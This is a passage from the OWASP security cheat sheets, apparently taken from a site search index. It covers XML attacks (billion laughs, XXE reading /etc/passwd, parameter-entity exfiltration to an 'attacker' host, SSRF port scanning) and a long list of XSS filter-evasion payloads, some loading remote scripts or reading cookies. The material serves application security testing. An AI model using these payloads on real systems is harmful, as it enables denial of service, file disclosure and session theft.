<!DOCTYPE root [\n <!ELEMENT root ANY>\n<!ENTITY A \"AAAAA...(a 100.000 A's)...AAAAA\">\n]>\n<root>&A;&A;&A;&A;...(a 100.000 &A;'s)...&A;&A;&A;&A;&A;</root>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#billion-laughs","title":"Billion Laughs","text":"

When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:

<!DOCTYPE root [\n <!ELEMENT root ANY>\n<!ENTITY LOL \"LOL\">\n<!ENTITY LOL1 \"&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;\">\n<!ENTITY LOL2 \"&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;\">\n<!ENTITY LOL3 \"&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;\">\n<!ENTITY LOL4 \"&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;\">\n<!ENTITY LOL5 \"&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;\">\n<!ENTITY LOL6 \"&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;\">\n<!ENTITY LOL7 \"&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;\">\n<!ENTITY LOL8 \"&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;\">\n<!ENTITY LOL9 \"&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;\">\n]>\n<root>&LOL9;</root>\n

The entity LOL9 will be resolved as the 10 entities defined in LOL8; each of these will in turn be resolved using LOL7, and so on. Finally, the CPU and/or memory will be affected by expanding the LOL entity 10^9 (1,000,000,000) times, roughly 3 x 10^9 characters, which could make the parser crash.
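On the defensive side, here is a brief hedged sketch (not from the cheat sheet; the file name is hypothetical) of how a JAXP parser can be told to enforce its built-in limits. FEATURE_SECURE_PROCESSING asks conforming parsers to apply implementation-defined resource limits, which in modern JDKs includes a cap on the number of entity expansions, so a document like the one above is rejected before memory is exhausted:

import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;

public class EntityExpansionLimits {
    public static void main(String[] args) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        // Ask the parser to enforce its secure-processing limits (entity expansion
        // count, among others); the exact limits are implementation defined.
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Parsing a billion-laughs style document is now expected to fail with a
        // fatal parse error instead of consuming all available memory.
        factory.newDocumentBuilder().parse("billion-laughs.xml"); // hypothetical file name
    }
}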

The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages.

The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:

<?XML VERSION=\"1.0\" ENCODING=\"UTF-8\"?>\n<!DOCTYPE SOAP-ENV:ENVELOPE [\n <!ELEMENT SOAP-ENV:ENVELOPE ANY>\n<!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED>\n<!ENTITY LOL \"LOL\">\n<!ENTITY LOL1 \"&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;\">\n<!ENTITY LOL2 \"&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;\">\n<!ENTITY LOL3 \"&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;\">\n<!ENTITY LOL4 \"&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;\">\n<!ENTITY LOL5 \"&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;\">\n<!ENTITY LOL6 \"&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;\">\n<!ENTITY LOL7 \"&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;\">\n<!ENTITY LOL8 \"&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;\">\n<!ENTITY LOL9 \"&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;\">\n]>\n<SOAP:ENVELOPE ENTITYREFERENCE=\"&LOL9;\"\nXMLNS:SOAP=\"HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/\">\n<SOAP:BODY>\n<KEYWORD XMLNS=\"URN:PARASOFT:WS:STORE\">FOO</KEYWORD>\n</SOAP:BODY>\n</SOAP:ENVELOPE>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#reflected-file-retrieval","title":"Reflected File Retrieval","text":"

Consider the following example code of an XXE:

<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n<!DOCTYPE root [\n <!ELEMENT includeme ANY>\n<!ENTITY xxe SYSTEM \"/etc/passwd\">\n]>\n<root>&xxe;</root>\n

The previous XML defines an entity named xxe, whose content is in fact the contents of /etc/passwd and which will be expanded wherever it is referenced in the document. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#server-side-request-forgery","title":"Server Side Request Forgery","text":"

Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes the server retrieve remote resources, such as a file fetched via HTTP/HTTPS/FTP. SSRF has been used to retrieve remote files, to prove an XXE when you cannot reflect back the file, to perform port scanning, or to perform brute force attacks on internal networks.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#external-dns-resolution","title":"External DNS Resolution","text":"

Sometimes it is possible to induce the application to perform server-side DNS lookups of arbitrary domain names. This is one of the simplest forms of SSRF, but it requires the attacker to analyze the DNS traffic. Burp has a plugin that checks for this attack.

<!DOCTYPE m PUBLIC \"-//B/A/EN\" \"http://checkforthisspecificdomain.example.com\">\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#external-connection","title":"External Connection","text":"

Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:

<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE root [\n <!ENTITY % xxe SYSTEM \"http://attacker/evil.dtd\">\n%xxe;\n]>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#file-retrieval-with-parameter-entities","title":"File Retrieval with Parameter Entities","text":"

Parameter entities allow for the retrieval of content using URL references. Consider the following malicious XML document:

<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<!DOCTYPE root [\n <!ENTITY % file SYSTEM \"file:///etc/passwd\">\n<!ENTITY % dtd SYSTEM \"http://attacker/evil.dtd\">\n%dtd;\n]>\n<root>&send;</root>\n

Here the DTD defines two external parameter entities: file, which loads a local file, and dtd, which loads a remote DTD. The remote DTD should contain something like this:

<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!ENTITY % all \"<!ENTITY send SYSTEM 'http://example.com/?%file;'>\">\n%all;\n

The second DTD causes the system to send the contents of the file back to the attacker's server as a parameter of the URL.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#port-scanning","title":"Port Scanning","text":"

The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:

1) Complete Disclosure: This is the simplest and most unusual scenario. With complete disclosure you can clearly see what's going on by receiving the complete responses from the server being queried, giving you an exact representation of what happened when connecting to the remote host.

2) Error-based: If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection:

java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80\n at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)\n at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)\n

3) Timeout-based: Timeouts could occur when connecting to open or closed ports, depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the response time when connecting to a valid port will be very quick (one second, for example). The differences between open and closed ports then become quite clear.

4) Time-based: Sometimes the differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host, and then analyze the average time per port to determine its status. This type of attack will be difficult to accomplish on higher-latency networks.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#brute-forcing","title":"Brute Forcing","text":"

Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the username and password as part of the URI scheme (http, ftp, etc.). For example:

<!DOCTYPE root [\n <!ENTITY user SYSTEM \"http://username:password@example.com:8080\">\n]>\n<root>&user;</root>\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html","title":"XSS Filter Evasion Cheat Sheet","text":""},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article is focused on providing application security testing professionals with a guide to assist in Cross Site Scripting testing. The initial contents of this article were donated to OWASP by RSnake, from his seminal XSS Cheat Sheet, which was at: http://ha.ckers.org/xss.html. That site now redirects to its new home here, where we plan to maintain and enhance it. The very first OWASP Prevention Cheat Sheet, the Cross Site Scripting Prevention Cheat Sheet, was inspired by RSnake's XSS Cheat Sheet, so we can thank RSnake for our inspiration. We wanted to create short, simple guidelines that developers could follow to prevent XSS, rather than simply telling developers to build apps that could protect against all the fancy tricks specified in a rather complex attack cheat sheet, and so the OWASP Cheat Sheet Series was born.

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#tests","title":"Tests","text":"

This cheat sheet lists a series of XSS attacks that can be used to bypass certain XSS defensive filters. Please note that input filtering is an incomplete defense for XSS, a point these tests can be used to illustrate.

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#basic-xss-test-without-filter-evasion","title":"Basic XSS Test Without Filter Evasion","text":"

This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here):

<SCRIPT SRC=https://cdn.jsdelivr.net/gh/Moksh45/host-xss.rocks/index.js></SCRIPT>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#xss-locator-polygot","title":"XSS Locator (Polygot)","text":"

The following is a \"polyglot test XSS payload.\" This test will execute in multiple contexts, including HTML, script strings, JavaScript, and URLs. Thank you to Gareth Heyes for this contribution.

javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/\"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#malformed-a-tags","title":"Malformed A Tags","text":"

Skip the HREF attribute and get to the meat of the XSS... Submitted by David Cross \\~ Verified on Chrome

\\<a onmouseover=\"alert(document.cookie)\"\\>xxs link\\</a\\>

or Chrome loves to replace missing quotes for you... if you ever get stuck just leave them off and Chrome will put them in the right place and fix your missing quotes on a URL or script.

\\<a onmouseover=alert(document.cookie)\\>xxs link\\</a\\>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#malformed-img-tags","title":"Malformed IMG Tags","text":"

Originally found by Begeek (but cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart HTML tags:

<IMG\u00a0\"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\"\\>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#fromcharcode","title":"fromCharCode","text":"

If no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need:

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#default-src-tag-to-get-past-filters-that-check-src-domain","title":"Default SRC Tag to Get Past Filters that Check SRC Domain","text":"

This will bypass most SRC domain filters. Inserting JavaScript in an event method will also apply to any HTML tag type injection that uses elements like Form, Iframe, Input, Embed etc. It will also allow any relevant event for the tag type to be substituted (like onblur or onclick), giving you an extensive number of variations for many of the injections listed here. Submitted by David Cross.

Edited by Abdullah Hussam (@Abdulahhusam).

<IMG SRC=# onmouseover=\"alert('xxs')\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#default-src-tag-by-leaving-it-empty","title":"Default SRC Tag by Leaving it Empty","text":"

<IMG SRC= onmouseover=\"alert('xxs')\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#default-src-tag-by-leaving-it-out-entirely","title":"Default SRC Tag by Leaving it out Entirely","text":"

<IMG onmouseover=\"alert('xxs')\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#on-error-alert","title":"On Error Alert","text":"

<IMG SRC=/ onerror=\"alert(String.fromCharCode(88,83,83))\"></img>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#img-onerror-and-javascript-alert-encode","title":"IMG onerror and JavaScript Alert Encode","text":"

<img src=x onerror=\"&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#decimal-html-character-references","title":"Decimal HTML Character References","text":"

All of the XSS examples that use a javascript: directive inside of an <IMG tag will not work in Firefox or Netscape 8.1+ (in the Gecko rendering engine mode).

<IMG\u00a0SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#decimal-html-character-references-without-trailing-semicolons","title":"Decimal HTML Character References Without Trailing Semicolons","text":"

This is often effective against XSS filters that look for \"&#XX;\", since most people don't know about padding (up to 7 numeric characters total). This is also useful against people who decode against strings like $tmp_string =\\~ s/.*\\&#(\\d+);.*/$1/; which incorrectly assumes a semicolon is required to terminate an HTML encoded string (I've seen this in the wild):

<IMG\u00a0SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#hexadecimal-html-character-references-without-trailing-semicolons","title":"Hexadecimal HTML Character References Without Trailing Semicolons","text":"

This is also a viable XSS attack against the above string $tmp_string=\\~ s/.*\\&#(\\d+);.*/$1/; which assumes that there is a numeric character following the pound symbol, which is not true with hex HTML characters.

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#embedded-tab","title":"Embedded Tab","text":"

Used to break up the cross site scripting attack:

<IMG SRC=\"jav ascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#embedded-encoded-tab","title":"Embedded Encoded Tab","text":"

Use this one to break up XSS:

<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#embedded-newline-to-break-up-xss","title":"Embedded Newline to Break-up XSS","text":"

Some websites claim that any of the chars 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work. See the ASCII chart for more details. The following four XSS examples illustrate this vector:

<IMG\u00a0SRC=\"jav&#x0A;ascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#embedded-carriage-return-to-break-up-xss","title":"Embedded Carriage Return to Break-up XSS","text":"

(Note: with the above I am making these strings longer than they have to be because the zeros could be omitted. Often I've seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1-7 characters.):

<IMG\u00a0SRC=\"jav&#x0D;ascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#null-breaks-up-javascript-directive","title":"Null breaks up JavaScript Directive","text":"

Null chars also work as XSS vectors, but not like the examples above: you need to inject them directly using something like Burp Proxy, use %00 in the URL string, or, if you want to write your own injection tool, either use vim (^V^@ will produce a null) or the following program to generate it into a text file. Okay, I lied again: older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char, 173 (the soft hyphen control char). But the null char %00 is much more useful and helped me bypass certain real world filters with a variation on this example:

perl\u00a0-e\u00a0'print\u00a0\"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\";'\u00a0>\u00a0out

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#spaces-and-meta-chars-before-the-javascript-in-images-for-xss","title":"Spaces and Meta Chars Before the JavaScript in Images for XSS","text":"

This is useful if the pattern match doesn't take into account spaces in the word javascript: (which is correct, since that won't render) and makes the false assumption that you can't have a space between the quote and the javascript: keyword. The reality is that you can have any char from 1-32 in decimal:

<IMG SRC=\" &#14; javascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#non-alpha-non-digit-xss","title":"Non-alpha-non-digit XSS","text":"

The Firefox HTML parser assumes a non-alpha-non-digit is not valid after an HTML keyword and therefore considers it to be a whitespace or non-valid token after an HTML tag. The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace. For example \\<SCRIPT\\\\s != \\<SCRIPT/XSS\\\\s:

<SCRIPT/XSS\u00a0SRC=\"http://xss.rocks/xss.js\"></SCRIPT>

This is based on the same idea as above, however it is expanded on, using the Rnake fuzzer. The Gecko rendering engine allows any character other than letters, numbers, or encapsulation chars (like quotes, angle brackets, etc.) between the event handler and the equals sign, making it easier to bypass cross site scripting blocks. Note that this also applies to the grave accent char, as seen here:

<BODY\u00a0onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>\n

Yair Amit brought to my attention that there is slightly different behavior between the IE and Gecko rendering engines that allows just a slash between the tag and the parameter, with no spaces. This could be useful if the system does not allow spaces.

<SCRIPT/SRC=\"http://xss.rocks/xss.js\"></SCRIPT>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#extraneous-open-brackets","title":"Extraneous Open Brackets","text":"

Submitted by Franz Sedlmaier, this XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorithm like Boyer-Moore that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to suppress a JavaScript error:

<<SCRIPT>alert(\"XSS\");//\\<</SCRIPT>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#no-closing-script-tags","title":"No Closing Script Tags","text":"

In Firefox and Netscape 8.1 in the Gecko rendering engine mode you don't actually need the \\></SCRIPT> portion of this Cross Site Scripting vector. Firefox assumes it's safe to close the HTML tag and add closing tags for you. How thoughtful! Unlike the next one, which doesn't affect Firefox, this does not require any additional HTML below it. You can add quotes if you need to, but they're generally not needed, although beware, I have no idea what the HTML will end up looking like once this is injected:

<SCRIPT\u00a0SRC=http://xss.rocks/xss.js?<\u00a0B\u00a0>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#protocol-resolution-in-script-tags","title":"Protocol Resolution in Script Tags","text":"

This particular variant was submitted by \u0141ukasz Pilorz and was based partially on Ozh's protocol resolution bypass below. This cross site scripting example works in IE, Netscape in IE rendering mode and Opera if you add a </SCRIPT> tag at the end. However, it is especially useful where space is an issue, and of course, the shorter your domain, the better. The \".j\" is valid, regardless of the encoding type, because the browser knows it in the context of a SCRIPT tag.

<SCRIPT\u00a0SRC=//xss.rocks/.j>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#half-open-htmljavascript-xss-vector","title":"Half Open HTML/JavaScript XSS Vector","text":"

Unlike Firefox, the IE rendering engine doesn't add extra data to your page, but it does allow the javascript: directive in images. This is useful as a vector because it doesn't require a close angle bracket. This assumes there is some HTML tag below where you are injecting this cross site scripting vector. Even though there is no close \">\" tag, the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. It gets around the following NIDS regex: /((\\\\%3D)|(=))\\[^\\\\n\\]\\*((\\\\%3C)|\\<)\\[^\\\\n\\]+((\\\\%3E)|\\>)/ because it doesn't require the end \">\". As a side note, this was also effective against a real world XSS filter I came across, using an open ended <IFRAME tag instead of an <IMG tag:

<IMG\u00a0SRC=\"('XSS')\""},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#double-open-angle-brackets","title":"Double Open Angle Brackets","text":"

Using an open angle bracket at the end of the vector instead of a close angle bracket causes different behavior in Netscape Gecko rendering. Without it, Firefox will work but Netscape won't:

<iframe\u00a0src=http://xss.rocks/scriptlet.html\u00a0<

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#escaping-javascript-escapes","title":"Escaping JavaScript Escapes","text":"

When the application is written to output some user information inside of JavaScript like the following: <SCRIPT>var a=\"$ENV{QUERY\\_STRING}\";</SCRIPT> and you want to inject your own JavaScript into it, but the server side application escapes certain quotes, you can circumvent that by escaping their escape character. When this gets injected it will read <SCRIPT>var a=\"\\\\\\\\\";alert('XSS');//\";</SCRIPT> which ends up un-escaping the double quote and causing the Cross Site Scripting vector to fire. The XSS locator uses this method:

\\\";alert('XSS');//

An alternative, if correct JSON or JavaScript escaping has been applied to the embedded data but not HTML encoding, is to finish the script block and start your own:

</script><script>alert('XSS');</script>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#end-title-tag","title":"End Title Tag","text":"

This is a simple XSS vector that closes <TITLE> tags, which can encapsulate the malicious cross site scripting attack:

</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#input-image","title":"INPUT Image","text":"

<INPUT\u00a0TYPE=\"IMAGE\"\u00a0SRC=\"javascript:alert('XSS');\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#body-image","title":"BODY Image","text":"

<BODY\u00a0BACKGROUND=\"javascript:alert('XSS')\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#img-dynsrc","title":"IMG Dynsrc","text":"

<IMG\u00a0DYNSRC=\"javascript:alert('XSS')\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#img-lowsrc","title":"IMG Lowsrc","text":"

<IMG\u00a0LOWSRC=\"javascript:alert('XSS')\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#list-style-image","title":"List-style-image","text":"

Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector:

<STYLE>li\u00a0{list-style-image:\u00a0url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS</br>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#vbscript-in-an-image","title":"VBscript in an Image","text":"

<IMG\u00a0SRC='vbscript:msgbox(\"XSS\")'>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#livescript-older-versions-of-netscape-only","title":"Livescript (older versions of Netscape only)","text":"

<IMG\u00a0SRC=\"livescript:[code]\">

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#svg-object-tag","title":"SVG Object Tag","text":"

<svg/onload=alert('XSS')>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#ecmascript-6","title":"ECMAScript 6","text":"
Set.constructor`alert\\x28document.domain\\x29\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#body-tag","title":"BODY Tag","text":"

This method doesn't require using any variants of javascript: or <SCRIPT... to accomplish the XSS attack. Dan Crowley additionally noted that you can put a space before the equals sign (onload= != onload =):

<BODY\u00a0ONLOAD=alert('XSS')>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#event-handlers","title":"Event Handlers","text":"

Event handlers like these can be used in XSS attacks similar to the ones above (this is the most comprehensive list on the net at the time of this writing). Thanks to Rene Ledosquet for the HTML+TIME updates.

The Dottoro Web Reference also has a nice list of events in JavaScript.

  1. FSCommand() (attacker can use this when executed from within an embedded Flash object)
  2. onAbort() (when user aborts the loading of an image)
  3. onActivate() (when object is set as the active element)
  4. onAfterPrint() (activates after user prints or previews print job)
  5. onAfterUpdate() (activates on data object after updating data in the source object)
  6. onBeforeActivate() (fires before the object is set as the active element)
  7. onBeforeCopy() (attacker executes the attack string right before a selection is copied to the clipboard - attackers can do this with the execCommand(\"Copy\") function)
  8. onBeforeCut() (attacker executes the attack string right before a selection is cut)
  9. onBeforeDeactivate() (fires right after the activeElement is changed from the current object)
  10. onBeforeEditFocus() (Fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected)
  11. onBeforePaste() (user needs to be tricked into pasting or be forced into it using the execCommand(\"Paste\") function)
  12. onBeforePrint() (user would need to be tricked into printing or attacker could use the print() or execCommand(\"Print\") function).
  13. onBeforeUnload() (user would need to be tricked into closing the browser - attacker cannot unload windows unless it was spawned from the parent)
  14. onBeforeUpdate() (activates on data object before updating data in the source object)
  15. onBegin() (the onbegin event fires immediately when the element's timeline begins)
  16. onBlur() (in the case where another popup is loaded and the window loses focus)
  17. onBounce() (fires when the behavior property of the marquee object is set to \"alternate\" and the contents of the marquee reach one side of the window)
  18. onCellChange() (fires when data changes in the data provider)
  19. onChange() (select, text, or TEXTAREA field loses focus and its value has been modified)
  20. onClick() (someone clicks on a form)
  21. onContextMenu() (user would need to right click on attack area)
  22. onControlSelect() (fires when the user is about to make a control selection of the object)
  23. onCopy() (user needs to copy something or it can be exploited using the execCommand(\"Copy\") command)
  24. onCut() (user needs to copy something or it can be exploited using the execCommand(\"Cut\") command)
  25. onDataAvailable() (user would need to change data in an element, or attacker could perform the same function)
  26. onDataSetChanged() (fires when the data set exposed by a data source object changes)
  27. onDataSetComplete() (fires to indicate that all data is available from the data source object)
  28. onDblClick() (user double-clicks a form element or a link)
  29. onDeactivate() (fires when the activeElement is changed from the current object to another object in the parent document)
  30. onDrag() (requires that the user drags an object)
  31. onDragEnd() (requires that the user drags an object)
  32. onDragLeave() (requires that the user drags an object off a valid location)
  33. onDragEnter() (requires that the user drags an object into a valid location)
  34. onDragOver() (requires that the user drags an object into a valid location)
  35. onDragDrop() (user drops an object (e.g. file) onto the browser window)
  36. onDragStart() (occurs when user starts drag operation)
  37. onDrop() (user drops an object (e.g. file) onto the browser window)
  38. onEnd() (the onEnd event fires when the timeline ends)
  39. onError() (loading of a document or image causes an error)
  40. onErrorUpdate() (fires on a databound object when an error occurs while updating the associated data in the data source object)
  41. onFilterChange() (fires when a visual filter completes state change)
  42. onFinish() (attacker can create the exploit when marquee is finished looping)
  43. onFocus() (attacker executes the attack string when the window gets focus)
  44. onFocusIn() (attacker executes the attack string when window gets focus)
  45. onFocusOut() (attacker executes the attack string when window loses focus)
  46. onHashChange() (fires when the fragment identifier part of the document's current address changes)
  47. onHelp() (attacker executes the attack string when the user hits F1 while the window is in focus)
  48. onInput() (the text content of an element is changed through the user interface)
  49. onKeyDown() (user depresses a key)
  50. onKeyPress() (user presses or holds down a key)
  51. onKeyUp() (user releases a key)
  52. onLayoutComplete() (user would have to print or print preview)
  53. onLoad() (attacker executes the attack string after the window loads)
  54. onLoseCapture() (can be exploited by the releaseCapture() method)
  55. onMediaComplete() (When a streaming media file is used, this event could fire before the file starts playing)
  56. onMediaError() (User opens a page in the browser that contains a media file, and the event fires when there is a problem)
  57. onMessage() (fire when the document received a message)
  58. onMouseDown() (the attacker would need to get the user to click on an image)
  59. onMouseEnter() (cursor moves over an object or area)
  60. onMouseLeave() (the attacker would need to get the user to mouse over an image or table and then off again)
  61. onMouseMove() (the attacker would need to get the user to mouse over an image or table)
  62. onMouseOut() (the attacker would need to get the user to mouse over an image or table and then off again)
  63. onMouseOver() (cursor moves over an object or area)
  64. onMouseUp() (the attacker would need to get the user to click on an image)
  65. onMouseWheel() (the attacker would need to get the user to use their mouse wheel)
  66. onMove() (user or attacker would move the page)
  67. onMoveEnd() (user or attacker would move the page)
  68. onMoveStart() (user or attacker would move the page)
  69. onOffline() (occurs if the browser is working in online mode and it starts to work offline)
  70. onOnline() (occurs if the browser is working in offline mode and it starts to work online)
  71. onOutOfSync() (interrupt the element's ability to play its media as defined by the timeline)
  72. onPaste() (user would need to paste or attacker could use the execCommand(\"Paste\") function)
  73. onPause() (the onpause event fires on every element that is active when the timeline pauses, including the body element)
  74. onPopState() (fires when user navigated the session history)
